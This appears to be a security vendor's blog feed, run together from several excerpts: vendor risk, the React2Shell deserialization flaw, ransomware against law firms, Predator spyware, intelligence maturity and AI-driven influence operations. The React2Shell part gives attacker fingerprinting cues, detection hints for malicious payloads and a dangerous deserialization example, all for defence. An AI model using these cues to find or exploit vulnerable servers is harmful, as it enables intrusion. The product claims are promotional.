Why Traditional Methods Fail: A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.
The Intelligence-Led Solution: Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.
The Solution: Move from “Trust” to “Continuous Verification”
The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.
This is why security leaders are shifting from a trust-but-verify model to a model of continuous verification, replacing blind trust with live intelligence.
Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.
Know which CVEs matter today across your ecosystem with Vulnerability Intelligence and exploit-in-the-wild context.
Detect compromised vendor access with Identity Intelligence and automated revocation workflows.
Map fourth-party dependencies and track concentration with Third-Party Intelligence risk scoring.
Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (e.g., ServiceNow) so that risk evidence triggers action.
Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:
“Which of my vendors poses the greatest risk to my business—right now?”
Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a personalized demo, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.
FAQ
What is the first step in creating a third-party risk management (TPRM) program?
The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).
What is the difference between third-party and fourth-party risk?
Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendor's vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth-party. The risk is cascaded up the supply chain and is often invisible to you without the right intelligence.
How often should we assess our third-party vendors?
High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.
How does Recorded Future help manage third-party risk more effectively?
Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.
How can I see risks from my vendors that are part of my own attack surface?
This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.
Cyber and physical risks are converging. Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.
Executives are prime targets. Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.
Threat intelligence can bridge the gap. Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.
Recorded Future enables proactive protection. By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.
A critical vulnerability in React Server Components is allegedly being actively exploited by multiple Chinese threat actors, Recorded Future recommends organizations patch their systems immediately.
What's Happening
CVE-2025-55182, dubbed "React2Shell," affects React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in several Meta packages. Amazon's AWS Threat Intelligence team reported on December 4 that Chinese threat groups including Earth Lamia, Jackpot Panda, and several untracked clusters are actively exploiting this vulnerability. However, AWS has not provided any further evidence for these attributions beyond IP addresses allegedly used by these threat groups. At this stage, Insikt Group cannot exclude the possibility that the same threat group might still be using the IP address 206[.]237[.]3[.]150, but we are currently unable to verify AWS’s attribution to Earth Lamia.
The vulnerability stems from unsafe payload deserialization at React Server Function endpoints. When successfully exploited, attackers can execute arbitrary code through crafted HTTP requests, potentially leading to complete backend compromise.
CVE-2025-55182 Intelligence Card c/o Recorded Future
There are now multiple publicly available exploit scripts (I forked one on GitHub here) for the React and Next.js vulnerabilities (CVE-2025-55182 and CVE-2025-66478).
The underlying issue is data serialization/deserialization, which evoked thoughts about a blog I wrote in 2016, addressing the same issue (at the time, the topic was CVE-2015-4852, a serialization flaw in Java objects that affected Oracle and Apache products).
Timeline illustrating the deserialization vulnerability impacts of 40+ critical CVEs across 6 ecosystems, over the course of 10 years.
2 Risk Takeaways
The exploit pattern repeats because serialization is a straightforward method for transferring data, and developers typically use what works. Coders use different languages and frameworks, yet the same class of vulnerability persists. The upstream opportunity here is for universities to aggressively drive security into all programming courses.
Everyone is a coder now, and security domain expertise has never been more important. Every business function will include AI-assisted coders, supercharging productivity and efficiency. LLMs don’t need to stop for human input, but understanding internet plumbing, tools, platforms, and security implications is now crucial. The most valuable employees can use AI for 10x+ impact AND catch potential issues as humans become the AI-copilots.
Technical Causation
Serialization is seductive: It’s the easy path for passing complex objects across trust boundaries (client ↔ server, service ↔ service). Developers reach for it because it “just works” (until it catastrophically doesn’t).
Framework abstraction hides the danger: Some percentage of Next.js developers using Server Actions are unaware that they’re invoking a custom serialization protocol. They’re calling a function. The risk is invisible until it’s exploited.
The ecosystem never learns collectively: Java shops learned (painfully) about gadget chains and ObjectInputStream. However, that institutional knowledge didn’t necessarily transfer to Node.js/React developers building RSC implementations a decade later.
The Threat
The attack surface has expanded once again. In 2015, we were tracking exploit chatter on Chinese forums appearing weeks before CVEs. Now, there are double-digit public GitHub repositories with weaponized exploit code within days of disclosure. Agentic workflows will soon compress that window down to minutes. The time-to-exploitation will amount to the time defenders spend reading about any new high-severity vulnerability.
PoC exploit testing, c/o Recorded Future
Defender Considerations for CVE-2025-55182 / CVE-2025-66478
Attackers differentiate vulnerable App Router targets from safe Pages Router sites by checking for window.__next_f vs __NEXT_DATA__. Your asset inventory should already know which flavor you’re running.
The vulnerability lives in the Flight protocol deserialization. If you’re not using Server Actions, consider disabling them. If you are, the endpoint (Next-Action header targets) is where to focus WAF rules.
Hunt for anomalous POST requests with Next-Action headers containing malicious multipart payloads targeting __proto__ or unusual serialized JSON structures. The exploit exfils via base64 in error digests.
The core issue is in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Custom RSC implementations outside Next.js are equally exposed.
RCE means immediate credential harvesting from environment variables, lateral movement via cloud metadata endpoints, and persistence via scheduled tasks or cron jobs. IR playbooks should assume full compromise.
AI-generated serialization vulnerability audit
For “Vibe Coders”: A Conversation with Claude Opus 4.5
Q: What’s a proper input validation methodology for deserializing data to avoid security failures?
A: Native serialization formats (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter) reconstruct objects with behavior, which means arbitrary code can execute during deserialization. The fix is using formats that only transfer data, not executable structures.
Safe alternatives:
1. Data-only interchange formats
JSON (most common)
Protocol Buffers (Google)
FlatBuffers (zero-copy, fast)
MessagePack (binary JSON, compact)
CBOR (binary, IETF standard)
These parse into primitive types and structures—no object instantiation, no code execution.
2. Schema validation on top
JSON Schema
Zod / Yup (JavaScript)
Pydantic (Python)
marshmallow (Python)
Define exactly what shape the data must have. Reject anything that doesn’t match before your application logic ever sees it.
3. When you need objects, build them explicitly
Instead of:
obj = pickle.load(untrusted_data) # dangerous
Do:
data = json.loads(untrusted_data) # safe parse obj = MyClass(**validated_schema(data)) # explicit construction
4. For config/markup
TOML instead of YAML (no code execution tags)
JSON5 for human-readable config
Avoid YAML’s !!python/object or Ruby’s !ruby/object—or use safe loaders exclusively (yaml.safe_load())
The one-liner: If your serialization format can reconstruct arbitrary types, it’s a vulnerability. Stick to dumb data formats + explicit object construction.
Q: Do modern LLMs know how to securely validate data by default? A: Technically, yes, practically, it’s complicated.
What’s in the training data:
Security research, CVE databases, OWASP guidance
Countless blog posts about pickle/unserialize dangers
Secure coding documentation from every major vendor
So if you ask directly—”Is pickle safe for untrusted data?”—any decent LLM will say no.
The problem:
LLMs are also trained on millions of Stack Overflow answers, tutorials, and GitHub repos that use pickle.load(), unserialize(), and yaml.load() because they’re convenient. When someone asks, “How do I save this object to a file and load it later?” the pattern-match often lands on the dangerous-but-common approach.
What I’ve observed:
Ask for “the fastest way” → often gets insecure code
Ask for “production-ready” or “secure” → better results
Ask without security context → coin flip
The real gap:
LLMs don’t reason about security—they predict likely tokens based on training. They won’t spontaneously say “wait, where is this data coming from?” the way an experienced developer might. The threat model isn’t automatic.
Practical advice for developers using LLM assistants:
Explicitly ask for secure alternatives
Ask “What are the security implications of this code?”
Treat generated code like untrusted input—review it
So yes, the knowledge is in there. But so is a decade of insecure examples, and the LLM doesn’t inherently prioritize one over the other unless prompted.
Stay Ahead with Recorded Future
Learn how Recorded Future's Vulnerability Intelligence tracks CVE disclosures, monitors exploit availability across GitHub and underground forums, and prioritizes vulnerabilities based on active threats to your environment. The platform compresses your response window from days to hours.
In the wake of the Salesforce/Gainsight breach (kudos to Salesforce for transparently sharing indicators of compromise and updated progress on remediation), third-party cyber and exposure risk is top of mind for many CISOs. Professional services firms are often overlooked in this context, with disastrous consequences.
Law firms, specifically, are particularly vulnerable to creating downstream risk impacts given the nature and purpose of legal services, and adversary targeting is on the rise.
The Industrial Consolidation of Legal Sector Attacks
RansomHub has emerged as 2025’s dominant threat after absorbing talent from disrupted groups like LockBit and ALPHV/BlackCat. By offering affiliates a 90/10 profit split versus the standard 70/30, they’ve attracted the most capable operators in the underground economy. Qilin’s Rust-based ransomware has specifically targeted legal entities with encryption-resistant payloads, making recovery nearly impossible.
Qilin ransomware profile c/o Recorded Future
The chart below, derived from Recorded Future analyst notes tracking ransomware extortion sites, illustrates the growth in ransomware targeting by industry, with legal firms remaining the number one target.
Ransomware victims industry comparison in 2024 and 2025.
These aren’t opportunistic attacks. Threat actors now maintain “dwell times” exceeding weeks inside firm networks, systematically identifying crown jewel intelligence before triggering extortion events. Industrialization means attackers understand exactly what creates maximum leverage: M&A intelligence during active deals, litigation strategies before trial, and decades of retained client data across multiple matters.
Recorded Future telemetry from the past quarter indicates that over 20 observed legal or legally adjacent firms have malware communicating with malicious command-and-control (C2) servers. While the observed traffic was 24 hours or less for some firms, other organizations saw persistence above 5 days. Certainly, a malicious implant does not equate to a full breach and exfiltration of client-sensitive data; however, it is a valuable signal to monitor for changes in third-party and fourth-party risk.
rxkipoqeu6
Infographic depicting recent malware dwell times in global legal firm victims
When Privilege Becomes Your Adversary’s Weapon
Courts have systematically eroded attorney-client privilege protection for breach investigations, creating a dangerous trap where forensic reports become ammunition for adversaries. The Capital One decision ordered production of Mandiant’s forensic report because the investigator served “business purposes” rather than pure legal advice.
The cascade accelerates through “sword and shield” waiver doctrine. Any use of breach investigation findings, even citing them in discovery responses, can trigger a subject matter waiver, requiring disclosure of all privileged communications related to threat assessment and remediation strategy. The 2024 Samsung Data Breach ruling made this explicit: sharing reports with 15 executives indicated business decision-making use, defeating privilege.
Federal Rule of Evidence 502 creates additional exposure when companies share incident reports with regulators. The 2023 Covington & Burling case saw the SEC subpoena the firm for names of 298 publicly-traded clients whose data “may have been exfiltrated,” though a court eventually ruled that only seven clients had to be named, it did establish that law firms cannot completely shield client identity from regulators, and those clients could then face SEC investigation for failure to disclose their counsel was breached.
M&A Intelligence Monetization at Scale
When Berkeley Research Group was hit by ransomware in March 2025 during a $700 million leveraged buyout by TowerBrook Capital Partners, the attack exposed M&A intelligence across hundreds of concurrent deals. This wasn’t just data theft; it was a systematic opportunity for market manipulation.
Academic research quantifies the damage. The Intralinks/Cass Business School study found 8-10% of M&A deals leak annually, with leaked deals achieving 47% median premiums versus 27% for non-leaked deals, which is a 20 percentage point difference worth millions per transaction. Only 49% of leaked deals complete versus 72% of non-leaked deals.
The Tyler Loudon case (2024) demonstrated the benefits of access when the defendant stole M&A information from his attorney wife, resulting in insider trading charges.
The Systematic Failure to Assess Professional Services Risk
Only 30% of law firms report clients asking them to complete security questionnaires (not that attestations are a wholly competent method for determining exposure risk), compared to a near-universal requirement for SaaS vendors. This exemption culture may stem from relationship bias and the misconception that “they’re not a tech vendor” despite law firms operating technology-intensive businesses.
The data concentration goes untracked. A single firm may hold M&A details, employee PII, trade secrets, litigation strategies, regulatory issues, and executive compensation across multiple business units that operate independently. The Orrick breach (2023) exposed 637,000+ individuals precisely because the firm aggregated data from employment litigation, mergers and acquisitions (M&A) transactions, and patent filings.
Retention amnesia compounds the risk. Lawyers traditionally “keep everything forever” due to a risk-averse culture, and potential regulatory requirements. Data from cases in the 1990s may still exist on unpatched legacy servers. Each year of retention adds cumulative breach exposure, yet enterprises rarely ask law firms about deletion policies or data locations.
Strategic Actions for Enterprise Defense
Treating professional services firms as high-risk technology vendors requires structural changes to vendor management frameworks.
Eliminate standing exemptions: Subject law and consulting firms to the same security requirements as SaaS vendors, including SOC 2 verification, independent audits, and quarterly assessments, without granting relationship-based waivers.
Map concentration risk: Identify all professional services vendors with data access across business units. Calculate total organizational exposure when single firms hold aggregated intelligence across HR, legal, finance, and compliance matters.
Audit fourth-party dependencies: Require disclosure of critical vendors, including MSPs, cloud providers, SaaS vendors, and document management systems. A breach of fourth-party infrastructure becomes your breach through the use of API tokens, credential harvesting, and VPN pivoting.
Establish time-bound access: Implement purpose-limited credentials that expire at the conclusion of a matter. Eliminate long-lived access that persists in engagement reports and consulting code repositories.
Define retention requirements: Specify data deletion periods in contracts with confirmation requirements. Audit compliance quarterly, as many firms retain data indefinitely on legacy systems.
Deploy breach detection: Place honeytokens in systems accessible to professional services firms. Establish 24-48 hour notification SLAs with emergency credential rotation capabilities.
Create specialized incident response protocols: Develop playbooks specifically for law firm breaches addressing privilege complications, litigation exposure assessment, and regulatory notification requirements.
Use threat intelligence to map services firms’ domain and IP space. Use the infrastructure map to monitor and alert on observed traffic between malware implants and command-and-control (C2) infrastructure. Recorded Future's Third-Party Intelligence automates this monitoring across your entire vendor ecosystem, providing real-time alerts when professional services firms show compromise indicators. Combined with Ransomware Mitigation capabilities, organizations can track ransomware group TTPs, monitor extortion sites, and receive early warnings when vendors appear on leak sites. Immediately notify affected service providers, disable organizational access, and assist in remediation.
When your law firm holding decades of critical data gets breached, you don’t have a vendor incident. You have a strategic intelligence compromise with multi-year competitive implications that traditional third-party risk frameworks didn’t adequately contemplate, as they exempt “trusted advisors” from the security scrutiny their data concentration demands. The shift from relationship-based trust to risk-based verification isn’t optional; it’s survival.
Learn how Recorded Future's Ransomware Mitigation and Third-Party Intelligence solutions work together to protect against cascading vendor risk. From tracking ransomware groups targeting legal firms to monitoring your vendors for real-time compromise indicators, you can detect and respond to vendor compromises before they cascade into your organization.
The author, Julian-Ferdinand Vögele, thanks Amnesty International's Security Lab for its ongoing reporting on the Intellexa and Predator spyware ecosystem. Today, Security Lab published a related report on Intellexa, which can be found here.
Executive Summary
Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.
The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including Poland and Greece.
Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (1, 2). Despite this, a core network of facilitators continues to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, insider leaks, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (1, 2), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.
Key Findings
Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.
Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.
Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.
The Maturity Gap: The Next Frontier in Threat Intelligence
Introduction
In Recorded Future’s 2025 State of Threat Intelligence report, 49% of enterprises describe their threat intelligence maturity as advanced — a figure that might surprise anyone who sees how complex this work remains in practice. While many organizations have made real progress, few have achieved the seamless integration and automation that “advanced” maturity implies.
At the same time, 87% of respondents expect significant improvement within the next two years, showing clear momentum and intent. The gap between today’s capabilities and tomorrow’s ambitions reflects a familiar reality: most teams have the right data but struggle to connect, automate, and operationalize it across their environments.
This article explores what advanced maturity really looks like, why progress often stalls, and how enterprises can accelerate their evolution using insights from this year’s report.
What Advanced Threat Intelligence Maturity Really Means
Recorded Future’s maturity assessment model outlines four stages of progress: Reactive, Proactive, Predictive, and Autonomous. Each stage reflects a higher level of integration, automation, and alignment across the business.
Advanced maturity sits toward the predictive and autonomous end of that model. At this level, intelligence operates continuously, informing security and risk decisions in real time. Teams can see what’s changing across their environment and act quickly to limit impact.
Mature programs pull in data from multiple internal and external sources, from threat feeds and vulnerability scanners to dark web monitoring and attack surface mapping. They use automation to cross-reference that information, enrich alerts with context, and flag the events that matter most. The same intelligence flows directly into the tools that analysts already use, such as SIEM and SOAR platforms, where it can trigger playbooks or prioritize vulnerabilities for patching. The result is less time spent chasing false positives and more time spent preventing real incidents.
Ultimately, advanced maturity is about action. Intelligence should help teams decide faster, target the right adversaries, and strengthen how the SOC, red team, and leadership make decisions every day.
Why Most Organizations Still Struggle to Advance
Even as threat intelligence tools improve, most enterprises still face the same structural barriers that slow maturity. In the 2025 State of Threat Intelligence report, nearly half of respondents (48%) list poor integration with existing security tools among their top three pain points, and 16% rank it as their biggest issue. Siloed feeds and disconnected platforms continue to make it difficult to operationalize intelligence across the security stack.
Another 50% of security professionals cite difficulty verifying the credibility and accuracy of intelligence. Without confidence in the data, analysts hesitate to automate or share findings broadly, keeping threat intelligence trapped in manual workflows and siloed from a wider audience of stakeholders who would benefit from the intelligence.
Though 46% report information overload as a major obstacle, volume isn’t the only issue. It’s also context. The same percentage say intelligence often lacks relevance to their environment, which makes it harder to link threats to business risk or decide what truly deserves attention.
These findings reflect an evolving market need: integration, trust, and relevance. Many teams have invested in more data and technology but still struggle to connect them in ways that deliver measurable improvement. The result is effort without momentum: progress that looks strong on paper but feels limited in day-to-day operations.
How to Build an Advanced Threat Intelligence Function
Closing the maturity gap starts with turning threat intelligence from a threat feed into a connected ecosystem of security tools that use and speak threat intelligence to inform decision making in real time. Most teams already have the ingredients — data feeds, automation platforms, and skilled analysts — but they’re often fragmented. Progress comes from building workflows that make intelligence part of everyday operations rather than a separate discipline.
Standardize and unify intelligence inputs. Consolidate vendors and combine internal telemetry with external threat data to create a single, reliable view of risk. When data sources align, teams can see the same picture and respond faster.
Automate enrichment and correlation. Replace manual investigation with automated context-building workflows that add detail to alerts as they’re generated. This helps analysts focus on analysis and decision-making instead of repetitive data gathering.
Integrate with core systems. Connect threat intelligence to SIEM, SOAR, EDR, and vulnerability management platforms so insights feed directly into detection and response. Integration reduces delay between visibility and action.
Leverage AI for speed and synthesis. Use AI models to summarize reports, surface anomalies, and streamline triage without increasing headcount. Automation at this level buys time for higher-value analysis.
Translate threats into impact. Map threats to the systems, data, and uptime they affect. When leaders understand operational impact, they can prioritize defenses that protect what matters most.
What Predictive and Autonomous Intelligence Deliver
In Recorded Future’s maturity model, predictive intelligence marks the point where teams move from detection to anticipation. Automation and analytics reveal early warning signs like new attacker infrastructure, emerging vulnerabilities, or shifts in adversary behavior, and feed that insight into prevention and risk planning. Predictive doesn’t mean knowing the future; it means seeing enough of what’s changing to act faster and more precisely.
From here, intelligence systems connect signals across internal telemetry, ISACs, and external threat data to map adversary intent and likely attack paths. That awareness helps teams focus on the exposures most likely to impact their environment, improving visibility and reducing uncertainty before an incident occurs.
At the autonomous stage, those workflows become largely self-directing. Machine learning and automation correlate data, generate detection rules, and trigger responses at a speed and scale that manual teams can’t sustain. Analysts move from running processes to refining them — validating alerts, adjusting priorities, and improving the quality of automation.
Full automation isn’t always possible. Legacy systems, uneven tool coverage, and budget limits mean some work will always remain manual. But even partial autonomy delivers meaningful gains. Teams respond faster, cut repetitive tasks, and keep budgets within their boundaries. Most importantly, they protect uptime, secure sensitive data, and grow customer trust with greater consistency and control.
Closing the Maturity Gap
The 2025 State of Threat Intelligence findings show clear progress, but they also highlight how far most organizations need to travel still. Advanced maturity isn’t an end destination, but rather the milestone where intelligence becomes routine, embedded, and measurable across the business.
Bridging the gap requires more than new tools. It takes alignment between technology, people, policy, and process: building workflows that connect intelligence to risk decisions, automating where it adds the most value, and measuring improvement over time. Every organization sits somewhere on this curve. The next step is to understand where you are, identify what’s holding you back, and make incremental changes that move intelligence closer to daily operations.
CopyCop is scaling AI-driven influence operations globally. The Russian influence network known as CopyCop has created more than 300 fake media websites spanning North America, Europe, and beyond. The operation primarily uses AI-generated content to erode public trust and support for Ukraine.
AI has become the new engine of manipulation. The network uses self-hosted large language models (LLMs) to mass-produce fabricated news stories, deepfakes, and fake fact-checking sites that imitate legitimate journalism.
Transparency and intelligence are the best defenses. Governments, newsrooms, and enterprises can counter these operations through domain monitoring, content verification, and proactive intelligence sharing.
Most “AI malware” observed so far falls into the AI malware Maturity Model (AIM3) Levels 1-3 (Experimenting through Optimizing), rather than fully automated campaigns.
AI is currently a force multiplier on existing attacker tradecraft, not a source of fundamentally new TTPs.
Many “first-ever AI malware” announcements are narrow research demos or PoCs with limited autonomy and unclear real-world impact.
Public reporting shows no confirmed examples of truly embedded, Bring-Your-Own-AI (BYOAI) malware running its own local model on victim hosts.
Defenders should prioritize monitoring abuse of legitimate AI services, hardening existing controls, and mapping threats to AIM3 levels rather than overreacting to sci-fi scenarios.
Login
